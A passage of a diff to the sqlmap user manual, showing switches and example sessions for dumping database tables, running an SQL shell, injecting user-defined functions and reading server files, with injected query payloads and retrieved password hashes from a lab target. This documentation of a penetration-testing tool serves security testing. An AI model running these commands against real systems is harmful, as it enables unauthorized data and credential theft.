[INFO] retrieved: nameisnull -Database: testdb -Table: users -[4 entries] -+------------+ -| surname | -+------------+ -| blissett | -| bunny | -| ming | -| nameisnull | -+------------+ - +It is also possible to specify which single character or range of characters +to dump with switches --first and --last. +For instance, if you want to dump columns' entries from the third to the +fifth character, provide --first 3 --last +5. +This feature only applies to the blind SQL injection techniques because for +error-based and UNION query SQL injection techniques the number of requests +is exactly the same, regardless of the length of the column's entry output +to dump.

    -sqlmap also stores for each table the dumped entries in a CSV format file. -You can see the absolute path where sqlmap stores the dumped tables entries -by providing a verbosity level greater than or equal to 1. - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --dump \ - -T users -D public -v 1 - -[...] -Database: public -Table: users -[5 entries] -+----+----------------------------------------------+-------------------+ -| id | name | surname | -+----+----------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | -| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | | nameisnull | -+----+----------------------------------------------+-------------------+ - -[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/ -192.168.136.131/dump/public/users.csv' -[...] - -$ cat ./output/192.168.136.131/dump/public/users.csv -id,name,surname -"1","luther","blissett" -"2","fluffy","bunny" -"3","wu","ming" -"4","sqlmap/0.8 (http://sqlmap.sourceforge.net)","user agent header" -"5","","nameisnull" - - -

    -You can also provide the --start and/or the --stop -options to limit the dump to a range of entries, while those entries can be further -limited to a range of character positions provided with --first -and/or the --last options: - - ---start specifies the first entry to enumerate. ---stop specifies the last entry to enumerate. - - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump \ - -T users -D testdb --start 2 --stop 4 -v 0 - -Database: testdb -Table: users -[3 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 2 | fluffy | bunny | -| 3 | wu | ming | -| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | -+----+--------------------------------------------+-------------------+ - - -

    -As you can see, sqlmap is very flexible. You can leave it to automatically -enumerate the whole database table up to a range of characters of a single -column of a specific table entry. +As you know by down, sqlmap is flexible. You can leave it to +automatically enumerate the whole database table or you can be very +precise in which characters to dump, from which columns and which range of +entries. Dump all databases tables entries @@ -3347,120 +2115,13 @@ column of a specific table entry. Switches: --dump-all and --exclude-sysdbs

    -It is possible to dump all databases tables entries at once. - -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0 - -Database: testdb -Table: users -[5 entries] -+----+--------------------------------------------+-------------------+ -| id | name | surname | -+----+--------------------------------------------+-------------------+ -| 1 | luther | blissett | -| 2 | fluffy | bunny | -| 3 | wu | ming | -| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | -| 5 | NULL | nameisnull | -+----+--------------------------------------------+-------------------+ - -Database: information_schema -Table: CHARACTER_SETS -[36 entries] -+--------------------+----------------------+-----------------------------+--------+ -| CHARACTER_SET_NAME | DEFAULT_COLLATE_NAME | DESCRIPTION | MAXLEN | -+--------------------+----------------------+-----------------------------+--------+ -| tis620 | tis620_thai_ci | TIS620 Thai | 1 | -| macroman | macroman_general_ci | Mac West European | 1 | -| dec8 | dec8_swedish_ci | DEC West European | 1 | -| ujis | ujis_japanese_ci | EUC-JP Japanese | 3 | -| eucjpms | eucjpms_japanese_ci | UJIS for Windows Japanese | 3 | -| armscii8 | armscii8_general_ci | ARMSCII-8 Armenian | 1 | -| ucs2 | ucs2_general_ci | UCS-2 Unicode | 2 | -| hp8 | hp8_english_ci | HP West European | 1 | -| latin2 | latin2_general_ci | ISO 8859-2 Central European | 1 | -| koi8u | koi8u_general_ci | KOI8-U Ukrainian | 1 | -| keybcs2 | keybcs2_general_ci | DOS Kamenicky Czech-Slovak | 1 | -| ascii | ascii_general_ci | US ASCII | 1 | -| cp866 | cp866_general_ci | DOS Russian | 1 | -| cp1256 | cp1256_general_ci | Windows Arabic | 1 | -| macce | macce_general_ci | Mac Central European | 1 | -| sjis | sjis_japanese_ci | Shift-JIS Japanese | 2 | -| geostd8 | geostd8_general_ci | GEOSTD8 Georgian | 1 | -| cp1257 | cp1257_general_ci | Windows Baltic | 1 | -| cp852 | cp852_general_ci | DOS Central European | 1 | -| euckr | euckr_korean_ci | EUC-KR Korean | 2 | -| cp1250 | cp1250_general_ci | Windows Central European | 1 | -| cp1251 | cp1251_general_ci | Windows Cyrillic | 1 | -| binary | binary | Binary pseudo charset | 1 | -| big5 | big5_chinese_ci | Big5 Traditional Chinese | 2 | -| gb2312 | gb2312_chinese_ci | GB2312 Simplified Chinese | 2 | -| hebrew | hebrew_general_ci | ISO 8859-8 Hebrew | 1 | -| koi8r | koi8r_general_ci | KOI8-R Relcom Russian | 1 | -| greek | greek_general_ci | ISO 8859-7 Greek | 1 | -| cp850 | cp850_general_ci | DOS West European | 1 | -| utf8 | utf8_general_ci | UTF-8 Unicode | 3 | -| latin1 | latin1_swedish_ci | cp1252 West European | 1 | -| latin7 | latin7_general_ci | ISO 8859-13 Baltic | 1 | -| cp932 | cp932_japanese_ci | SJIS for Windows Japanese | 2 | -| latin5 | latin5_turkish_ci | ISO 8859-9 Turkish | 1 | -| swe7 | swe7_swedish_ci | 7bit Swedish | 1 | -| gbk | gbk_chinese_ci | GBK Simplified Chinese | 2 | -+--------------------+----------------------+-----------------------------+--------+ - -[...] - +It is possible to dump all databases tables entries at once that the +session user has read access on.

    -You can also provide the --exclude-sysdbs option to exclude all -system databases. In that case sqlmap will only dump entries of users' databases -tables. - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dump-all \ - --exclude-sysdbs -v 0 - -Database: master -Table: spt_datatype_info_ext -[10 entries] -+----------------+-----------------+-----------+-----------+ -| AUTO_INCREMENT | CREATE_PARAMS | typename | user_type | -+----------------+-----------------+-----------+-----------+ -| 0 | length | char | 175 | -| 0 | precision,scale | numeric | 108 | -| 0 | max length | varbinary | 165 | -| 0 | precision,scale | decimal | 106 | -| 1 | precision | numeric | 108 | -| 0 | length | nchar | 239 | -| 0 | max length | nvarchar | 231 | -| 0 | length | binary | 173 | -| 0 | max length | varchar | 167 | -| 1 | precision | decimal | 106 | -+----------------+-----------------+-----------+-----------+ - -[...] - -Database: master -Table: users -[5 entries] -+----+----------------------------------------------+-------------------+ -| id | name | surname | -+----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | -| 2 | fluffy | bunny | -| 1 | luther | blisset | -| 3 | wu | ming | -| 5 | NULL | nameisnull | -+----+----------------------------------------------+-------------------+ - -[...] - +You can also provide the --exclude-sysdbs switch to +exclude all system databases. In that case sqlmap will only dump entries +of users' databases tables.

    Note that on Microsoft SQL Server the master database is not @@ -3468,26 +2129,40 @@ considered a system database because some database administrators use it as a users' database. -Execute custom SQL statement +Search for columns, tables or databases + +

    +Switches: --search, -C, -T, -D + +

    +TODO + + +Run custom SQL statement

    Switches: --sql-query and --sql-shell

    -The SQL query and the SQL shell features makes the user able to execute -custom SQL statements on the web application's back-end database -management. +The SQL query and the SQL shell features allow to run arbitrary SQL +statements on the database management system. sqlmap automatically dissects the provided statement, determines which -technique to use to inject it and how to pack the SQL payload accordingly. - -If it is a SELECT statement, sqlmap will retrieve its output -through the blind SQL injection or UNION query SQL injection technique -depending on the user's options. Otherwise it will execute the query -through the stacked query SQL injection technique if the web application -supports multiple statements on the back-end database management system. +technique is appropriate to use to inject it and how to pack the SQL +payload accordingly.

    -Examples on a Microsoft SQL Server 2000 Service Pack 0 target: +If the query is a SELECT statement, sqlmap will retrieve its +output. +Otherwise it will execute the query through the stacked query SQL +injection technique if the web application supports multiple statements on +the back-end database management system. +Beware that some web application technologies do not support stacked +queries on specific database management systems. For instance, PHP does +not support stacked queries when the back-end DBMS is MySQL, but it does +support when the back-end DBMS is PostgreSQL. + +

    +Examples against a Microsoft SQL Server 2000 target: $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \ @@ -3517,335 +2192,52 @@ SELECT 'foo', 'bar': 'foo, bar'

    -As you can see from the last example, sqlmap splits provided query into two -different SELECT statements for it to be able to retrieve the -output even in case when using the blind SQL injection technique. -Otherwise, in UNION query SQL injection technique it only performs a single -HTTP request to get the user's query output: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query \ - "SELECT 'foo', 'bar'" -v 2 --union-use - -[...] -[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar'' -[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing -technique -[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability -[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id' -[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection -vulnerability -[hh:mm:03] [DEBUG] query: UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+ -CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32))) -+(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+ -CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+ -CHAR(116)), NULL-- AND 8373=8373 -[hh:mm:03] [DEBUG] performed 3 queries in 0 seconds -SELECT 'foo', 'bar' [1]: -[*] foo, bar - +As you can see, sqlmap splits the provided query into two different +SELECT statements then retrieves the output for each separate +query.

    -If your SELECT statement contains a FROM clause, sqlmap -asks the user if such statement can return multiple entries. In that -case the tool knows how to unpack the query correctly to retrieve its -whole output, entry per entry, when going through blind SQL injection -technique. In provided example, UNION query SQL injection it retrieved -the whole output in a single response. +If the provided query is a SELECT statement and contains a +FROM clause, sqlmap will ask you if such statement can return +multiple entries. In that case the tool knows how to unpack the query +correctly to count the number of possible entries and retrieve its output, +entry per entry.

    -Example on a PostgreSQL 8.3.5 target: +The SQL shell option allows you to run your own SQL statement +interactively, like a SQL console connected to the database management +system. +This feature provides TAB completion and history support too. - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-query \ - "SELECT usename FROM pg_user" -v 0 -[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries -do you want to retrieve? -[a] All (default) -[#] Specific number -[q] Quit -Choice: 2 -SELECT usename FROM pg_user [2]: -[*] postgres -[*] testuser - +Brute force

    -As you can see from the last example, sqlmap counts the number of entries -for a given query and asks for number of entries to dump. -Otherwise, if the LIMIT is also specified, or similar clause, -sqlmap will not ask for anything. It will just unpack the query and return its -output, entry per entry, when going through blind SQL injection technique. -In a given example, sqlmap used UNION query SQL injection to retrieve the -whole output in a single response. +These options can be used to run brute force checks. + +Brute force tables names

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-query \ - "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 2 - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM -mysql.user LIMIT 1, 3' -[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it -into distinct queries to be able to retrieve the output even if we are going blind -[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM -mysql.user LIMIT 1, 1 -[hh:mm:22] [INFO] retrieved: localhost -[hh:mm:22] [DEBUG] performed 69 queries in 0 seconds -[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM -mysql.user LIMIT 1, 1 -[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 -[hh:mm:24] [DEBUG] performed 293 queries in 2 seconds -[hh:mm:24] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM -mysql.user LIMIT 2, 1 -[hh:mm:24] [INFO] retrieved: localhost -[hh:mm:25] [DEBUG] performed 69 queries in 0 seconds -[hh:mm:25] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM -mysql.user LIMIT 2, 1 -[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 -[hh:mm:27] [DEBUG] performed 293 queries in 2 seconds -[hh:mm:27] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM -mysql.user LIMIT 3, 1 -[hh:mm:27] [INFO] retrieved: localhost -[hh:mm:28] [DEBUG] performed 69 queries in 0 seconds -[hh:mm:28] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) -FROM mysql.user LIMIT 3, 1 -[hh:mm:28] [INFO] retrieved: -[hh:mm:28] [DEBUG] performed 6 queries in 0 seconds -SELECT host, password FROM mysql.user LIMIT 1, 3 [3]: -[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 -[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 -[*] localhost, - +Switches: --common-tables

    -The SQL shell option gives you an access to run your own SQL statement -interactively, like a SQL console connected to the back-end database -management system. -Note that this feature provides TAB completion and history support. +TODO + + +Brute force columns names

    -Example of history support on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0 - -sql> SELECT 'foo' -SELECT 'foo': 'foo' - -sql> [UP arrow key shows the just run SQL SELECT statement, DOWN arrow key cleans the shell] -sql> SELECT version() -SELECT version(): 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real -(Ubuntu 4.3.2-1ubuntu11) 4.3.2' - -sql> exit - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0 - -sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell] -sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename -[hh:mm:45] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y -[hh:mm:46] [INPUT] the SQL query that you provide can return up to 3 entries. How many entries -do you want to retrieve? -[a] All (default) -[#] Specific number -[q] Quit -Choice: 2 -SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]: -[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4 -[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093 - +Switches: --common-columns

    -Example of TAB completion on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0 - -sql> [TAB TAB] - LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) -LIMIT 0, 1)='Y' -AND ORD(MID((%s), %d, 1)) > %d -CAST(%s AS CHAR(10000)) -COUNT(%s) -CURRENT_USER() -DATABASE() -IFNULL(%s, ' ') -LENGTH(%s) -LIMIT %d, %d -MID((%s), %d, %d) -ORDER BY %s ASC -SELECT %s FROM %s.%s -SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND -table_schema='%s' -SELECT grantee FROM information_schema.USER_PRIVILEGES -SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES -SELECT schema_name FROM information_schema.SCHEMATA -SELECT table_schema, table_name FROM information_schema.TABLES -SELECT user, password FROM mysql.user -SLEEP(%d) -VERSION() -\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+) -sql> SE[TAB] -sql> SELECT - - -

    -As you can see the TAB functionality shows the queries defined for the -back-end database management system in sqlmap XML queries file, but you -can run whatever SELECT statement you want. - -

    -Example of asterisk expansion on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --sql-shell \ - -v 2 - -[...] -[hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER -sql> SELECT * FROM test.users -[hh:mm:48] [INFO] fetching SQL SELECT query output: 'SELECT * FROM test.users' -[hh:mm:48] [INFO] you did not provide the fields in your query. sqlmap will retrieve the -column names itself. -[hh:mm:48] [INFO] fetching columns for table 'users' on database 'test' -[hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test' -[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) -FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND -table_schema=CHAR(116,101,115,116) -[hh:mm:48] [INFO] retrieved: 3 -[hh:mm:48] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM -information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND -table_schema=CHAR(116,101,115,116) LIMIT 0, 1 -[hh:mm:48] [INFO] retrieved: id -[hh:mm:48] [DEBUG] performed 20 queries in 0 seconds -[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM -information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND -table_schema=CHAR(116,101,115,116) LIMIT 1, 1 -[hh:mm:48] [INFO] retrieved: name -[hh:mm:48] [DEBUG] performed 34 queries in 0 seconds -[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM -information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND -table_schema=CHAR(116,101,115,116) LIMIT 2, 1 -[hh:mm:48] [INFO] retrieved: surname -[hh:mm:48] [DEBUG] performed 55 queries in 0 seconds -[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users -[hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [DEBUG] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM -test.users -[hh:mm:04] [INFO] retrieved: 5 -[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many -entries -do you want to retrieve? -[a] All (default) -[#] Specific number -[q] Quit -Choice: 3 -[hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 -[hh:mm:09] [INFO] retrieved: 1 -[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 -[hh:mm:09] [INFO] retrieved: luther -[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM -test.users ORDER BY id ASC LIMIT 0, 1 -[hh:mm:09] [INFO] retrieved: blissett -[hh:mm:09] [DEBUG] performed 62 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 -[hh:mm:09] [INFO] retrieved: 2 -[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 -[hh:mm:09] [INFO] retrieved: fluffy -[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM -test.users ORDER BY id ASC LIMIT 1, 1 -[hh:mm:09] [INFO] retrieved: bunny -[hh:mm:09] [DEBUG] performed 41 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 -[hh:mm:09] [INFO] retrieved: 3 -[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 -[hh:mm:09] [INFO] retrieved: wu -[hh:mm:09] [DEBUG] performed 20 queries in 0 seconds -[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM -test.users ORDER BY id ASC LIMIT 2, 1 -[hh:mm:09] [INFO] retrieved: ming -[hh:mm:10] [DEBUG] performed 34 queries in 0 seconds -SELECT * FROM test.users [3]: -[*] 1, luther, blissett -[*] 2, fluffy, bunny -[*] 3, wu, ming - - -

    -As you can see from the example, if the SELECT statement has -an asterisk instead of the column(s) name, sqlmap first retrieves all -column names of the current table, asks if the query can return multiple -entries and goes on. - -

    -Example of SQL statement other than SELECT on a PostgreSQL -8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1 - -[...] -back-end DBMS: PostgreSQL - -[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER -sql> SELECT COUNT(name) FROM users -[hh:mm:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' -[hh:mm:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n -[hh:mm:59] [INFO] retrieved: 4 -SELECT COUNT(name) FROM users: '4' - -sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); -[hh:mm:35] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:40] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users -(id, name, surname) VALUES (5, 'from', 'sql shell');' -[hh:mm:40] [INFO] done -sql> SELECT COUNT(name) FROM users -[hh:mm:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' -[hh:mm:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n -[hh:mm:53] [INFO] retrieved: 5 -SELECT COUNT(name) FROM users: '5' - - -

    -As you can see from the example, when the user provides a SQL statement -other than SELECT, sqlmap recognizes it, tests if the web -application supports stacked queries and in case it does, it executes -the provided SQL statement in a multiple statement mode. - -

    -Beware that some web application technologies do not support stacked -queries on specific database management systems. For instance, PHP does -not support stacked queries when the back-end DBMS is MySQL, but it does -support when the back-end DBMS is PostgreSQL. +TODO User-defined function injection +

    +These options can be used to create custom user-defined functions. + Inject custom user-defined functions (UDF)

    @@ -3862,7 +2254,12 @@ options, execute them. When you are finished using the injected UDFs, sqlmap can also remove them from the database for you.

    -Example on a PostgreSQL 8.4: +These techniques are detailed in the white paper +. + +

    +Example against a PostgreSQL target: $ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0 @@ -3887,7 +2284,7 @@ do you want to retrieve the return value of the UDF? [Y/n] return value: 'test' do you want to call this or another injected UDF? [Y/n] n -do you want to remove UDF 'sys_eval'? [Y/n] +do you want to remove UDF 'sys_eval'? [Y/n] y [12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually @@ -3896,12 +2293,17 @@ be deleted manually If you want, you can specify the shared library local file system path via command line using --shared-lib option. +

    +This feature is available only when the database management system is +MySQL or PostgreSQL. + + File system access Read a file from the database server's file system

    -Switch: --read-file +Switch: --file-read

    It is possible to retrieve the content of files from the underlying file @@ -3909,82 +2311,21 @@ system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. -The file specified can be either a text or a binary file. sqlmap will -handle it automatically. +The file specified can be either a textual or a binary file. sqlmap will +handle it properly.

    These techniques are detailed in the white paper -.

    -Example on a PostgreSQL 8.3.5 target to retrieve a text file: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.aspx?id=1" \ - --read-file "C:\example.txt" -v 2 - -[...] -[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL -web server operating system: Windows 2003 or 2008 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 -back-end DBMS: PostgreSQL - -[hh:mm:53] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:53] [INFO] detecting back-end DBMS version from its banner -[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)), -CHR(32)) -[hh:mm:53] [INFO] retrieved: 8.3.5, -[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds -[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5) -[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500)) -[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) -[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data -LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)|| -CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END) -[hh:mm:03] [INFO] retrieved: 1 -[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds -[hh:mm:03] [INFO] the back-end DBMS operating system is Windows -[hh:mm:03] [DEBUG] cleaning up the database management system -[hh:mm:03] [DEBUG] removing support tables -[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique -[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file -is binary, its content will not be retrieved -[hh:mm:04] [INFO] fetching file: 'C:/example.txt' -[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea) -[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table -[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt' -[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM -sqlmapfile -[hh:mm:04] [INFO] retrieved: 1 -[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds -[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101) -||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1 -[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ== -[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds -[hh:mm:22] [DEBUG] cleaning up the database management system -[hh:mm:22] [DEBUG] removing support tables -[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile -C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.136.131/files/C__example.txt' - -[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.136.131' - -$ cat output/192.168.136.131/files/C__example.txt -This is a text file - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target to -retrieve a binary file: +Example against a Microsoft SQL Server 2005 target to retrieve a binary +file: $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \ - --read-file "C:\example.exe" --union-use -v 1 + --file-read "C:/example.exe" -v 1 [...] [hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server @@ -3992,57 +2333,40 @@ web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 -[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing -technique -[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name' -[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql -injection vulnerability -[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter -'name' by appending a false condition after the parameter value -[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) -inband sql injection vulnerability -valid union: 'http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION -ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ' - -[hh:mm:49] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name' -[hh:mm:54] [INFO] fetching file: 'C:/example.exe' -[hh:mm:54] [INFO] the SQL query provided returns 3 entries -C:/example.exe file saved to: '/home/inquis/sqlmap/output/192.168.136.131/files/ -C__example.exe' - -[hh:mm:54] [INFO] Fetched data logged to text 